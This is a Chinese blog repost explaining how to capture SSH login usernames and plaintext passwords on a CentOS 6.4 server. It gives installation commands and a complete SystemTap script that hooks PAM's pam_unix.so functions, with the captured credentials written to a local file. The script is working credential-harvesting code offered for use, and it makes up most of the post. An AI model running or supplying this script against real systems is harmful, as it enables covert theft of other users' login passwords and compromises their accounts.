使用systemtap抓取ssh登录的用户名和密码

网友投稿 1433 2022-09-22

使用systemtap抓取ssh登录的用户名和密码

使用systemtap抓取ssh登录的用户名和密码

测试环境:CentOS6.4 32位

内核版本:2.6.32-358.el6.i686

yum --releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

touch /root/capture_pass.stp

#!/usr/bin/stap global username, pass, isSuccRet = 1; probe process("/lib/security/pam_unix.so").function("_unix_verify_password") { username = user_string($name); pass = user_string($p); } probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return { if ($return == 0) { printf("User: %s\nPassword: %s\n\n", username, pass); isSuccRet = 0; } } probe process("/lib/security/pam_unix.so").function("pam_sm_open_session") { if (isSuccRet != 0) { printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass); } isSuccRet = 1; }

touch password.txt

chmod +x capture_pass.stp

stap capture_pass.stp -o password.txt

本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。

原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。

版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:一个会vue的前端,如何快速上手开发小程序
下一篇:30道Python基础练习题(python基础训练题)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~